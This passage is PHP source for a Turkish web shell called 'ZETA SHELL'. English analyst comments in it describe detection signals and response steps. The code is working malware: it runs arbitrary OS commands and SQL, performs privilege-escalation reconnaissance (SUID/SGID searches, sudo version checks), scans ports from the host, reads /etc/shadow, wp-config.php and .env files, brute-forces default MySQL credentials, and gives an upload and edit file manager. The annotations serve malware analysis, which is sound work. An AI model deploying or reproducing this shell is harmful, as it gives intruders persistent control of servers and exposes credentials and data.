elseif (isset($_POST['extract_item'])) { $item_name = $_POST['item_name']; $item_path = PATH . "/" . $item_name; $ext = fileExtension($item_name); $cmd = ''; if (!file_exists($item_path) || !is_file($item_path)) { $msg='Hata: Arşiv yok!'; $type='error'; } else { if ($ext == 'zip') { $cmd = "unzip " . escapeshellarg($item_path) . " -d " . escapeshellarg(PATH); } elseif (($ext == 'gz' && strpos($item_name, '.tar.gz') !== false) || ($ext == 'tgz')) { $cmd = "tar -xzvf " . escapeshellarg($item_path) . " -C " . escapeshellarg(PATH); } elseif ($ext == 'tar') { $cmd = "tar -xvf " . escapeshellarg($item_path) . " -C " . escapeshellarg(PATH); } elseif (($ext == 'bz2' && strpos($item_name, '.tar.bz2') !== false) || ($ext == 'tbz2')) { $cmd = "tar -xjvf " . escapeshellarg($item_path) . " -C " . escapeshellarg(PATH); } elseif ($ext == 'rar') { $cmd = "unrar x " . escapeshellarg($item_path) . " " . escapeshellarg(PATH); } if ($cmd) { $result = runCommand($cmd); if ($result['retval'] == 0 || stripos($result['output'], 'error') === false) { $msg = $item_name . ' açıldı! 🎉'; $type = 'success'; } else { $msg = 'Hata: Açılamadı! ' . $result['output']; $type = 'error'; } } else { $msg = 'Hata: Desteklenmeyen tür.'; $type = 'error'; } } set_message_and_redirect($msg, $type, PATH); }
// POST `search_files`: runs `find` with -maxdepth 1 in PATH for names containing
// search_term, through runCommand(), and shows the result on the page (no redirect).
elseif (isset($_POST['search_files'])) { $search_term = $_POST['search_term']; if (empty($search_term)) { $action_result_output = "Arama terimi boş olamaz!"; } else { $search_cmd = "find " . escapeshellarg(PATH) . " -maxdepth 1 -name '*" . escapeshellarg($search_term) . "*' -print"; $cmd_result = runCommand($search_cmd); $action_result_output = "--- Arama Sonuçları ('" . htmlspecialchars($search_term) . "') ---n" . ($cmd_result['output'] ?: 'Sonuç bulunamadı.'); } $opened_details = 'files'; }
// POST `run_command`: passes the POST field `command` to runCommand() unchanged and
// prints the escaped output. This is the arbitrary command execution capability; it
// runs with the privileges of the PHP process. POST bodies are usually not in access
// logs, so the reliable host-side trace is the process spawned by the PHP worker.
elseif(isset($_POST['run_command'])) { $cmd = $_POST['command']; $cmd_result = runCommand($cmd); $action_result_output = "<b>Komut:</b> " . htmlspecialchars($cmd) . "n--- Çıktı ---n" . $cmd_result['output']; $opened_details = 'command'; }
// POST `analyze_system`: local reconnaissance. Collects `uname -a`, /etc/os-release (or
// /etc/issue), `sudo -V`, and filesystem-wide `find / -perm -4000` and `-perm -2000`
// listings of SUID/SGID files, then appends a fixed "suggestions" footer. A whole-
// filesystem find for SUID/SGID files started by a web server process is a strong
// detection signal for this step.
elseif(isset($_POST['analyze_system'])) { $analysis_output = "--- OS/Kernel ---n"; $analysis_output .= runCommand('uname -a')['output'] . "n"; $os_release = @file_get_contents('/etc/os-release'); $analysis_output .= ($os_release ? "--- /etc/os-release ---n" . htmlspecialchars($os_release) . "n" : runCommand('cat /etc/issue')['output'] . "n"); $analysis_output .= "--- Sudo ---n"; $analysis_output .= runCommand('sudo -V 2>&1')['output'] . "n"; $analysis_output .= "--- SUID/SGID ---n"; $analysis_output .= "SUID:n" . runCommand('find / -perm -4000 -type f -ls 2>/dev/null')['output'] . "n"; $analysis_output .= "SGID:n" . runCommand('find / -perm -2000 -type f -ls 2>/dev/null')['output'] . "n"; $analysis_output .= "n--- ÖNERİLER ---n* Exploit-DB / searchsploitn* Sudo versiyonu / GTFOBinsn* sudo -ln"; $action_result_output = $analysis_output; $opened_details = 'system'; }
// POST `run_network_tool`: network actions originating from the compromised host.
// `network_tool` selects ping or traceroute (via runCommand), a TCP connect scan done
// in PHP with fsockopen() over `network_ports` or a built-in port list (1 s timeout,
// only open ports reported), or a `curl -k -i -L` request. The target is whatever
// `network_target` names, so internal addresses reachable from the web server are in
// scope. Egress monitoring on the web host (connection attempts to many ports, curl
// started by the PHP user) is where this shows up.
elseif(isset($_POST['run_network_tool'])) { $tool = $_POST['network_tool']; $target = $_POST['network_target']; $cmd = ''; switch ($tool) { case 'ping': $cmd = "ping -c 4 " . escapeshellarg($target); break; case 'traceroute': $cmd = "traceroute " . escapeshellarg($target); break; case 'portscan_fsockopen': $ports_to_scan_str = trim($_POST['network_ports']); if (empty($ports_to_scan_str)) { $ports_to_scan = array(21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 5432, 8080, 8443); } else { $ports_to_scan = array_map('intval', explode(',', $ports_to_scan_str)); } $scan_result = "--- fsockopen Port Scan (" . htmlspecialchars($target) . ") ---n"; $timeout = 1; foreach($ports_to_scan as $p) { if ($p > 0 && $p <= 65535) { $conn = @fsockopen($target, $p, $errno, $errstr, $timeout); if ($conn) { $scan_result .= "Port " . $p . ": AÇIK 🎉n"; @fclose($conn); } } } $action_result_output = $scan_result . "(Sadece açıklar)n"; break; case 'curl_req': $curl_cmd = "curl -k -i -L --connect-timeout 5 " . escapeshellarg($target); $cmd_result = runCommand($curl_cmd); $action_result_output = "--- cURL Sonucu (" . htmlspecialchars($target) . ") ---n" . $cmd_result['output']; break; } if ($cmd && $tool != 'portscan_fsockopen' && $tool != 'curl_req') { $cmd_result = runCommand($cmd); $action_result_output = "--- " . htmlspecialchars($tool) . " Sonucu (" . htmlspecialchars($target) . ") ---n" . $cmd_result['output']; } elseif (empty($action_result_output)) { $action_result_output = "Hata: Geçersiz araç/hedef veya işlem başarısız."; } $opened_details = 'network'; }
// POST `run_db_query`: connects with mysqli to db_host/db_name using the submitted
// db_user/db_pass and runs the submitted db_query as-is. Result sets are printed as a
// text table; other statements report the affected row count. Database audit or general
// query logs on the target server, showing connections from the web host, are the place
// to look for what was run.
elseif (isset($_POST['run_db_query'])) { $db_host = $_POST['db_host']; $db_user = $_POST['db_user']; $db_pass = $_POST['db_pass']; $db_name = $_POST['db_name']; $db_query = $_POST['db_query']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $db_query = stripslashes($db_query); } $db_output = "--- DB Sorgu ({$db_host} / {$db_name}) --- 🐬n"; if (!function_exists('mysqli_connect')) { $db_output .= "Hata: PHP MySQLi yok!"; } else { $conn = @mysqli_connect($db_host, $db_user, $db_pass, $db_name); if (!$conn) { $db_output .= "Bağlantı Hatası: " . mysqli_connect_error() . " 🤬"; } else { $db_output .= "Bağlantı OK! ✅n"; $result = @mysqli_query($conn, $db_query); if (!$result) { $db_output .= "Sorgu Hatası: " . mysqli_error($conn) . "n"; } else { if ($result instanceof mysqli_result) { $num_rows = mysqli_num_rows($result); $db_output .= "Sorgu OK (" . $num_rows . " satır)nn"; if ($num_rows > 0) { $fields = mysqli_fetch_fields($result); $header = ""; foreach ($fields as $field) { $header .= $field->name . "t | "; } $db_output .= rtrim($header, "t | ") . "n" . str_repeat("-", strlen($header) * 1.1) . "n"; while ($row = mysqli_fetch_assoc($result)) { $line = ""; foreach ($row as $col) { $line .= ($col === null ? 'NULL' : $col) . "t | "; } $db_output .= rtrim($line, "t | ") . "n"; } } mysqli_free_result($result); } else { $affected_rows = mysqli_affected_rows($conn); $db_output .= "Sorgu OK (" . $affected_rows . " satır etkilendi)n"; } } @mysqli_close($conn); } } $action_result_output = $db_output; $opened_details = 'database'; }
// POST `run_helper_tool`: string utilities applied to helper_input: base64 encode and
// decode, md5, sha1, URL encode and decode. The result is HTML-escaped before display.
elseif(isset($_POST['run_helper_tool'])) { $helper_tool = $_POST['helper_tool']; $helper_input = $_POST['helper_input']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $helper_input = stripslashes($helper_input); } $helper_output = ''; switch($helper_tool) { case 'base64_encode': $helper_output = base64_encode($helper_input); break; case 'base64_decode': $helper_output = @base64_decode($helper_input); if ($helper_output === false) $helper_output = "Hata: Geçersiz Base64!"; break; case 'md5': $helper_output = md5($helper_input); break; case 'sha1': $helper_output = sha1($helper_input); break; case 'url_encode': $helper_output = urlencode($helper_input); break; case 'url_decode': $helper_output = urldecode($helper_input); break; default: $helper_output = "Bilinmeyen araç!"; } $action_result_output = "--- " . strtoupper($helper_tool) . " Sonucu --- n" . htmlspecialchars($helper_output); $opened_details = 'helpers'; }
// POST `read_config_post`: reads one file from a fixed map chosen by config_file_key:
// /etc/passwd, /etc/shadow, wp-config.php and .env (in PATH and its parent), the Apache
// and nginx main configs, the loaded php.ini, /etc/mysql/my.cnf and sshd_config.
// Response note: once this shell is confirmed on a host, secrets held in any of these
// files that the PHP process could read (database passwords, application keys) should
// be treated as exposed and rotated.
elseif (isset($_POST['read_config_post'])) { $config_file = ''; $common_configs = array( 'passwd' => '/etc/passwd', 'shadow' => '/etc/shadow', 'wpconfig' => PATH . '/wp-config.php', 'wpconfig_up' => dirname(PATH) . '/wp-config.php', 'env' => PATH . '/.env', 'env_up' => dirname(PATH) . '/.env', 'apache_conf' => '/etc/apache2/apache2.conf', 'nginx_conf' => '/etc/nginx/nginx.conf', 'php_ini' => php_ini_loaded_file() ?: '/etc/php/php.ini', 'my_cnf' => '/etc/mysql/my.cnf', 'sshd_config' => '/etc/ssh/sshd_config' ); $config_key = $_POST['config_file_key']; if (isset($common_configs[$config_key])) { $config_file = $common_configs[$config_key]; } $config_content = @file_get_contents($config_file); if ($config_content !== false) { $action_result_output = "--- " . htmlspecialchars($config_file) . " ---⛏️nn" . htmlspecialchars($config_content); } elseif (!empty($config_file)) { $action_result_output = "Hata: Dosya (" . htmlspecialchars($config_file) . ") okunamadı! 🖕"; } else { $action_result_output = "Hata: Bilinmeyen config key."; } $opened_details = 'helpers'; }
// POST `check_db_creds`: credential guessing against MySQL. Tries a built-in list of
// common user/password pairs against db_host_check on port 3306 with mysqli_connect()
// and lists the pairs that connect. On the database side this appears as a short burst
// of failed logins for root, admin, mysql, user and test coming from the web host;
// accounts with default or empty passwords are what it finds.
elseif (isset($_POST['check_db_creds'])) { $db_host = trim($_POST['db_host_check']); $db_output = "--- MySQL Credential Check (" . htmlspecialchars($db_host) . ") --- 🐬n"; if (empty($db_host)) { $db_output .= "Hata: Host adresi girmedin amk!n"; } elseif (!function_exists('mysqli_connect')) { $db_output .= "Hata: PHP MySQLi eklentisi yok!n"; } else { $common_creds = array( 'root' => array('', 'root', 'toor', 'password', 'admin', '1234', '123456'), 'admin' => array('admin', 'password', '123456', 'root', ''), 'mysql' => array('mysql', 'password', ''), 'user' => array('user', 'password'), 'test' => array('test', 'password', '') ); $found_creds = array(); $port = 3306; $db_output .= "Deniyor...n"; @set_time_limit(60); foreach ($common_creds as $user => $passwords) { foreach ($passwords as $pass) { $conn = @mysqli_connect($db_host, $user, $pass, '', $port); if ($conn) { $found_creds[] = "✅ " . htmlspecialchars($user) . " / " . htmlspecialchars($pass === '' ? '(BOŞ ŞİFRE)' : $pass); @mysqli_close($conn); } } } if (!empty($found_creds)) { $db_output .= "n--- BULUNAN ŞİFRELER --- 🎉n"; $db_output .= implode("n", $found_creds); } else { $db_output .= "n--- Geçerli şifre bulunamadı / Bağlanılamadı! 😭 ---"; } } $action_result_output = $db_output; $opened_details = 'dbcheck'; }
} // POST sonu
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>ZETA SHELL <?php echo $SHELL_VERSION; ?> [Alpha]</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12"></script>
<style>
/* --- ZETA SHELL v13.2 CSS --- */
@import url('https://fonts.googleapis.com/css2?family=Fira+Code:wght@400;700&display=swap');
:root { --bg-color: #0a0a0a; --terminal-bg: #1a1a1a; --text-color: #00ff00; --header-color: #ff003c; --link-color: #00ffff; --link-hover: #ffffff; --border-color: #333; --icon-color: #ff003c; --button-bg: #ff003c; --button-text: #000; --button-hover-bg: #ff4d6d; --table-header-bg: #2a2a2a; --code-bg: #050505; --hacker-font: 'Fira Code', monospace; --perms-color: #aaaaaa; --success-bg: rgba(0, 255, 0, 0.1); --success-border: #00ff00; --error-bg: rgba(255, 0, 60, 0.15); --error-border: #ff003c; --info-bg: rgba(0, 255, 255, 0.1); --info-border: #00ffff; --icon-edit: #66ccff; --icon-rename: #66ccff; --icon-delete: #ff4d4d; --icon-download: #99ff99; --icon-archive: #ffcc66; --icon-extract: #ffad33; --icon-lock: #f0ad4e; --icon-unlock: #f0ad4e; --icon-chattr-plus: #d9534f; --icon-chattr-minus: #5cb85c; }
body { background-color: var(--bg-color); color: var(--text-color); font-family: var(--hacker-font); margin: 0; padding: 0; font-size: 13px; line-height: 1.5; overflow-x: hidden; }
.container-fluid { padding: 8px; max-width: 100%; margin: 0 auto; }
.hacker-nav { background-color: var(--terminal-bg); border-bottom: 2px solid var(--header-color); padding: 6px 10px; margin-bottom: 8px; display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 5px; }
.navbar-brand { color: var(--text-color); font-weight: bold; font-size: 1.1em; } .navbar-brand i { margin-right: 6px; color: var(--header-color); }
.hacker-controls { display: flex; align-items: center; gap: 6px; flex-wrap: wrap; }
.hacker-controls a button, .hacker-controls form button, #musicButton { background-color: var(--button-bg); color: var(--button-text); border: none; padding: 3px 7px; cursor: pointer; font-family: var(--hacker-font); font-weight: bold; transition: all 0.2s ease; border-radius: 3px; font-size: 0.75em; }
.hacker-controls a button:hover, .hacker-controls form button:hover, #musicButton:hover { background-color: var(--button-hover-bg); transform: scale(1.05); }
#musicButton { padding: 3px 5px; font-size: 1.0em; line-height: 1; }
.logout-btn { background-color: #500 !important; color: #fff !important; } .logout-btn:hover { background-color: var(--header-color) !important; }
.breadcrumb { background: var(--terminal-bg); padding: 5px 8px; margin-bottom: 8px; border: 1px solid var(--border-color); border-radius: 3px; word-break: break-all; color: var(--text-color); font-size: 0.8em; } .breadcrumb i { margin-right: 4px; color: var(--header-color); }
.system-overview { background: var(--terminal-bg); border: 1px solid var(--border-color); border-radius: 3px; padding: 5px 8px; margin-bottom: 8px; font-size: 0.75em; display: flex; flex-wrap: wrap; gap: 8px; } .system-overview span { white-space: nowrap; } .system-overview strong { color: var(--link-color); }
.hacker-table { width: 100%; border-collapse: collapse; margin-top: 8px; background-color: var(--terminal-bg); border: 1px solid var(--border-color); box-shadow: 0 0 4px rgba(0, 255, 0, 0.1); font-size: 0.8em; table-layout: auto; }
.hacker-table th, .hacker-table td { border: 1px solid var(--border-color); padding: 4px 6px; text-align: left; vertical-align: middle; word-break: normal; }
.hacker-table th { background-color: var(--table-header-bg); color: var(--header-color); font-weight: bold; white-space: nowrap; }
.hacker-table th.col-name { min-width: 150px; }
.hacker-table th.col-type { width: 50px; text-align: center;}
.hacker-table th.col-perms { width: 60px; text-align: center;}
.hacker-table th.col-actions { width: 200px; text-align: center;}
.hacker-table td:first-child { word-break: break-all; }
.hacker-table td.cell-type { text-align: center; font-weight: bold; color: var(--perms-color); }
.hacker-table td.cell-perms { text-align: center; }
.hacker-table td.action-buttons-cell { white-space: nowrap; text-align: center; }
.hacker-table tr:nth-child(even) { background-color: rgba(0, 255, 0, 0.02); } .hacker-table tr:hover { background-color: rgba(0, 255, 255, 0.05); }
.hacker-table td a { color: var(--link-color); text-decoration: none; margin-right: 3px; display: inline-block; position: relative; } .hacker-table td a:hover { color: var(--link-hover); }
.perms { color: var(--perms-color); font-size: 0.9em; cursor: help; white-space: nowrap; }
form { margin-bottom: 8px; }
.form-section, .content-section { background-color: var(--terminal-bg); padding: 8px; margin-top: 8px; border: 1px solid var(--border-color); border-radius: 5px; } .form-section h3, .content-section h3 { font-size: 0.95em; margin-top: 0; margin-bottom: 6px; color: var(--header-color); border-bottom: 1px dashed var(--border-color); padding-bottom: 3px;} .form-section h4, .content-section h4 { font-size: 0.85em; margin-bottom: 5px; color: var(--link-color); }
input[type="file"], input[type="text"], input[type="password"], textarea, select { background-color: var(--code-bg); color: var(--text-color); border: 1px solid var(--border-color); padding: 4px; margin: 2px 0; width: calc(100% - 12px); font-family: var(--hacker-font); border-radius: 3px; font-size: 0.8em; }
input[type="file"] { padding: 6px 4px; }
input[type="text"]:focus, input[type="password"]:focus, textarea:focus, select:focus { border-color: var(--link-color); outline: none; box-shadow: 0 0 3px var(--link-color);}
textarea { min-height: 120px; resize: vertical; }
select { width: auto; padding: 4px; }
.action-btn, .config-btn, .quick-cmd-btn { background-color: var(--button-bg); color: var(--button-text); border: none; padding: 4px 8px; margin: 3px 3px 3px 0; cursor: pointer; font-family: var(--hacker-font); font-weight: bold; transition: all 0.2s ease; border-radius: 3px; font-size: 0.8em; }
.action-btn:hover, .config-btn:hover, .quick-cmd-btn:hover { background-color: var(--button-hover-bg); transform: translateY(-1px); }
.action-btn i, .config-btn i, .quick-cmd-btn i { margin-right: 3px; }
.message { padding: 6px 10px; margin: 8px 0; border-radius: 3px; font-weight: bold; border: 1px solid transparent; font-size: 0.85em; display: flex; align-items: center; } .message i { font-size: 1.0em; margin-right: 5px; }
.message.success { background-color: var(--success-bg); border-color: var(--success-border); color: var(--text-color); }
.message.error { background-color: var(--error-bg); border-color: var(--error-border); color: var(--header-color); }
.message.info { background-color: var(--info-bg); border-color: var(--info-border); color: var(--link-color); }
pre.command-output, pre.info-output { background-color: var(--code-bg); color: var(--text-color); border: 1px solid var(--border-color); padding: 6px; margin-top: 6px; border-radius: 3px; white-space: pre-wrap; word-wrap: break-word; max-height: 250px; overflow-y: auto; font-size: 0.8em; }
details.collapsible-section { background-color: var(--terminal-bg); border: 1px solid var(--border-color); padding: 0; margin-top: 12px; border-radius: 5px; overflow: hidden; }
details.collapsible-section summary { color: var(--header-color); background-color: var(--table-header-bg); font-size: 0.95em; padding: 7px 10px; cursor: pointer; font-weight: bold; list-style: none; display: block; transition: background-color 0.2s ease; }
details.collapsible-section summary::-webkit-details-marker { display: none; }
details.collapsible-section summary::before { content: '\f078'; font-family: 'Font Awesome 6 Free'; font-weight: 900; margin-right: 6px; display: inline-block; transition: transform 0.2s; font-size: 0.8em;}
details.collapsible-section[open] summary::before { transform: rotate(-180deg); }
details.collapsible-section[open] summary { background-color: var(--header-color); color: var(--button-text); }
details.collapsible-section > div { padding: 8px; }
.hacker-footer { text-align: center; margin-top: 15px; padding: 6px; color: #555; font-size: 0.75em; border-top: 1px solid var(--border-color); } .hacker-footer a { color: var(--link-color); text-decoration: none; } .hacker-footer a:hover { color: var(--link-hover); } .hacker-footer span { color: var(--header-color); font-weight: bold; }
.hacker-icon-folder { color: #ffff00; } .hacker-icon-error { color: #ff4d4d; } .hacker-icon-config { color: #cccccc; } .hacker-icon-code { color: #66ccff; } .hacker-icon-image { color: #cc99ff; } .hacker-icon-audio { color: #ff99cc; } .hacker-icon-video { color: #ffcc66; } .hacker-icon-text { color: #ffffff; } .hacker-icon-archive { color: #99ff99; } .hacker-icon-doc { color: #ffad33; } .hacker-icon-default { color: var(--text-color); opacity: 0.7; } .hacker-icon-link { color: var(--link-color); }
.action-icon-edit, .action-icon-rename { color: var(--icon-edit); } .action-icon-delete { color: var(--icon-delete); } .action-icon-download { color: var(--icon-download); } .action-icon-archive { color: var(--icon-archive); } .action-icon-extract { color: var(--icon-extract); } .action-icon-lock { color: var(--icon-lock); } .action-icon-unlock { color: var(--icon-unlock); } .action-icon-chattr-plus { color: var(--icon-chattr-plus); } .action-icon-chattr-minus { color: var(--icon-chattr-minus); }
.action-buttons-cell a:hover .action-icon-edit, .action-buttons-cell a:hover .action-icon-rename, .action-buttons-cell a:hover .action-icon-download, .action-buttons-cell a:hover .action-icon-lock, .action-buttons-cell a:hover .action-icon-unlock { color: var(--link-hover); }
.action-buttons-cell button:hover .action-icon-delete, .action-buttons-cell button:hover .action-icon-archive, .action-buttons-cell button:hover .action-icon-extract, .action-buttons-cell button:hover .action-icon-chattr-plus, .action-buttons-cell button:hover .action-icon-chattr-minus { color: var(--link-hover); }
@keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } body { animation: fadeIn 0.6s ease-out; }
@keyframes glow { 0% { text-shadow: 0 0 3px var(--text-color), 0 0 5px var(--text-color); } 50% { text-shadow: 0 0 6px var(--text-color), 0 0 10px var(--text-color); } 100% { text-shadow: 0 0 3px var(--text-color), 0 0 5px var(--text-color); } }
.navbar-brand span#shell-title { animation: glow 2.5s infinite alternate; }
@media (max-width: 768px) { .hacker-nav { flex-direction: column; align-items: flex-start;} .hacker-controls { margin-top: 8px; width: 100%; justify-content: flex-start;} .system-overview { font-size: 0.7em; gap: 6px;} .hacker-table th, .hacker-table td { padding: 3px 4px; font-size: 0.75em;} .hacker-table th.col-type, .hacker-table td.cell-type { display: none; } .hacker-table th.col-perms, .hacker-table td.cell-perms { width: 50px; } .hacker-table th.col-actions, .hacker-table td.action-buttons-cell { width: auto; text-align: left; } .quick-cmd-buttons button { font-size: 0.7em; padding: 2px 5px;} details.collapsible-section summary { font-size: 0.9em; padding: 6px 10px;} }
.hidden-form { display: none; }
.flex-container { display: flex; flex-wrap: wrap; gap: 6px; align-items: flex-end; margin-bottom: 8px; }
.flex-item { flex-grow: 1; min-width: 70px; }
.flex-item-small { flex-grow: 0; flex-basis: 110px; min-width: 90px;}
.action-buttons-cell form, .action-buttons-cell a { display: inline-block !important; margin: 0 1px !important; vertical-align: middle; }
.action-buttons-cell button { background: none; border: none; padding: 0; cursor: pointer; font-size: 0.9em; }
.action-buttons-cell button i, .action-buttons-cell a i { font-size: 1.1em; vertical-align: middle; }
.action-buttons-cell .separator { display: inline-block; border-left: 1px solid var(--border-color); height: 1em; margin: 0 3px; vertical-align: middle; opacity: 0.5; }
/* Mobil Edit/Rename Form İyileştirmesi */
#editFormContainer h3, .form-section h3 { font-size: 1.1em; /* Başlık biraz daha büyük */}
.form-section form label { display: block; margin-bottom: 3px; font-weight: bold; font-size: 0.85em;} /* Rename etiketi */
.form-section form input[type="text"] { margin-bottom: 8px;}
</style>
</head>
<body>
<div class="container-fluid">
<nav class="hacker-nav">
<div class="navbar-brand">
<i class="fas fa-skull-crossbones"></i>
<span id="shell-title"></span>
</div>
<div class="hacker-controls">
<a href="?p=<?php echo encodePath('/'); ?>"><button type="button" title="Kök Dizine Git"><i class="fas fa-broadcast-tower"></i></button></a>
<a href="?p=<?php echo urlencode(encodePath($doc_root)); ?>"><button type="button" title="Web Root"><i class="fas fa-sitemap"></i></button></a>
<a href="?p=<?php echo urlencode(encodePath($script_path)); ?>"><button type="button" title="Shell Dizini"><i class="fas fa-file-code"></i></button></a>
<button id="musicButton" title="Müzik Çal/Durdur">🎵</button>
<a href="?logout=1"><button type="button" class="logout-btn" title="Çıkış Yap"><i class="fas fa-sign-out-alt"></i></button></a>
</div>
</nav>
<!-- Sistem Özeti -->
<div class="system-overview">
<span><strong>User:</strong> <?php /* NOTE(review): runCommand() is defined outside this excerpt; presumably it executes the string as an OS command, which would make a 'whoami' child process of the PHP/web-server worker on every page render a detection point - confirm against the helper. The output is echoed without htmlspecialchars(). */ echo runCommand('whoami')['output']; ?></span>
<span><strong>UID/GID:</strong> <?php /* Same helper with 'id'; also echoed unescaped. */ echo runCommand('id')['output']; ?></span>
<span><strong>Server IP:</strong> <?php /* getServerIP() is defined outside this excerpt; its source of the address cannot be confirmed from here. */ echo getServerIP(); ?></span>
<span><strong>PHP:</strong> <?php echo PHP_VERSION; ?></span>
<span style="flex-basis: 100%; word-break: break-all;"><strong>System:</strong> <?php /* php_uname() with no argument returns OS name, host name, release, version and machine type; the panel discloses all of it to whoever is logged in. */ echo php_uname(); ?></span>
</div>
<div class="breadcrumb">
<i class="fas fa-folder"></i> Path: <?php $path_for_breadcrumb = PATH; $path_for_breadcrumb = str_replace('\', '/', $path_for_breadcrumb); if (empty($path_for_breadcrumb) || $path_for_breadcrumb === '/') { echo "<a href="?p=" . encodePath('/') . "">/</a>"; } else { $paths = explode('/', trim($path_for_breadcrumb, '/')); $current_built_path = ''; $is_windows_path = preg_match('/^[a-zA-Z]:$/', isset($paths[0]) ? $paths[0] : ''); if ($is_windows_path) { $current_built_path = $paths[0] . '/'; echo "<a href="?p=" . encodePath($current_built_path) . "">" . htmlspecialchars($paths[0]) . "</a>/"; array_shift($paths); } else { echo "<a href="?p=" . encodePath('/') . "">/</a>"; } foreach ($paths as $id => $dir_part) { if ($dir_part === '') continue; $current_built_path .= $dir_part . '/'; echo "<a href='?p=" . encodePath(rtrim($current_built_path, '/')) . "'>" . htmlspecialchars($dir_part) . "</a>/"; } } ?>
</div>
<!-- Mesaj Alanı -->
<?php if (!empty($message)): echo '<div class="message '.$message_type.'"><i class="fas '.($message_type == 'success' ? 'fa-check-circle' : ($message_type == 'error' ? 'fa-exclamation-triangle' : 'fa-info-circle')).'"></i> '.htmlspecialchars($message).'</div>'; endif; ?>
<?php
// Main content.
// NOTE(review): analyst annotations on a web-shell sample; the code below is unchanged.
// The directory listing is rendered only when neither the rename ('r') nor the
// edit ('e') query parameter is present.
$show_file_manager = !isset($_GET['r']) && !isset($_GET['e']);
// Edit / rename forms.
// Edit view (query parameters 'e' and 'file'): joins PATH . "/" . <file>, then
// prints the file contents HTML-escaped into a <textarea>. The 'file' value is
// only passed through urldecode() before the join; no basename()/realpath()
// containment check is visible in this block. If is_really_writable() (helper
// defined outside this excerpt) reports the file as not writable, the view is
// read-only; otherwise a POST form is emitted with fields 'data' and
// 'file_to_save' and submit button 'edit'. The handler for that POST is not in
// this excerpt.
// Log-review indicators taken from this block: GET requests carrying 'e',
// 'file' and 'p' parameters, and POST bodies containing 'file_to_save'.
if (isset($_GET['e']) && isset($_GET['file'])) { $file_to_edit = urldecode($_GET['file']); $file_path = PATH . "/" . $file_to_edit; echo '<div class="form-section" id="editFormContainer" style="border-color: var(--link-color);">'; if (!is_file($file_path)) { echo '<div class="message error">Hata: Dosya değil!</div>'; } elseif (!is_readable($file_path)) { echo '<div class="message error">Hata: Okunamıyor!</div>'; } elseif (!is_really_writable($file_path)) { $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '<h3 style="color: orange;"><i class="fas fa-eye"></i> Görüntüleniyor (Yazılamaz!): ' . htmlspecialchars($file_to_edit) . '</h3><textarea readonly style="background-color: #101010;">' . $content . '</textarea><br><a href="?p='.urlencode(encodePath(PATH)).'"><button type="button" class="action-btn" style="background-color:#6c757d;">Geri Dön</button></a>'; } else { $content = htmlspecialchars(@file_get_contents($file_path) ?: ''); echo '<form method="post" id="editForm"><h3 style="color: var(--link-color);"><i class="fas fa-file-pen"></i> Editing: ' . htmlspecialchars($file_to_edit) . '</h3><textarea name="data" id="edit_data">' . $content . '</textarea><br><input type="hidden" name="file_to_save" value="' . htmlspecialchars($file_to_edit) . '"><button type="submit" class="action-btn" name="edit" id="edit_save_button"><i class="fas fa-save"></i> Kaydet!</button> <a href="?p='.urlencode(encodePath(PATH)).'"><button type="button" class="action-btn" style="background-color:#6c757d;">İptal</button></a></form>'; } echo '</div>'; }
// Rename view (query parameters 'r' and 'file'): renders a POST form with the
// hidden field 'original_name', the text field 'new_name' and submit button
// 'rename'. Nothing is renamed here; the POST handler is outside this excerpt.
// The name is HTML-escaped with htmlspecialchars() before it is placed in the
// heading and in both input values.
// Log-review indicators: GET requests with 'r', 'file' and 'p', and POST bodies
// containing 'original_name' together with 'new_name'.
if (isset($_GET['r']) && isset($_GET['file'])) { $item_to_rename = urldecode($_GET['file']); echo '<div class="form-section" style="border-color: var(--link-color);"><h3><i class="fas fa-edit"></i> Rename: ' . htmlspecialchars($item_to_rename). '</h3><form method="post"><input type="hidden" name="original_name" value="' . htmlspecialchars($item_to_rename) . '"><label for="rename_new_name_input" style="display: block; margin-bottom: 3px;">Yeni Ad:</label><input type="text" id="rename_new_name_input" name="new_name" value="' . htmlspecialchars($item_to_rename) . '" required><br><button type="submit" class="action-btn" name="rename">Rename!</button> <a href="?p='.urlencode(encodePath(PATH)).'"><button type="button" class="action-btn" style="background-color:#6c757d;">İptal</button></a></form></div>'; }
// Dosya Yöneticisi
if ($show_file_manager) {
// Upload & Yeni Oluşturma & Arama Formları
echo '<div class="flex-container" style="gap: 10px;">';
echo '<div class="form-section flex-item" style="padding: 8px 12px; margin-top: 0;"><h4><i class="fas fa-upload"></i> Upload</h4><form method="post" enctype="multipart/form-data" style="margin-bottom:0;"><div class="flex-container" style="margin-bottom:0;"><div class="flex-item"><input type="file" name="fileToUpload" id="fileToUpload" required style="padding: 4px 6px; font-size:0.8em;"></div><div style="flex-grow: 0;"><button type="submit" class="action-btn" name="upload" style="padding: 4px 8px; font-size:0.8em;"><i class="fas fa-rocket"></i> Yükle</button></div></div></form></div>';
echo '<div class="form-section flex-item" style="padding: 8px 12px; margin-top: 0;"><h4><i class="fas fa-plus-square"></i> Yeni Oluştur</h4><form method="post" style="margin-bottom:0;"><div class="flex-container" style="margin-bottom:0;"><div class="flex-item"><input type="text" name="item_name" placeholder="Ad..." required style="padding: 4px 6px; font-size:0.8em;"></div><div style="flex-grow: 0;"><select name="item_type" style="padding: 4px; font-size:0.8em;"><option value="file">Dosya</option><option value="dir">Dizin</option></select></div><div style="flex-grow: 0;"><button type="submit" class="action-btn" name="create_item" style="padding: 4px 8px; font-size:0.8em;"><i class="fas fa-magic"></i> Yarat</button></div></div></form></div>';
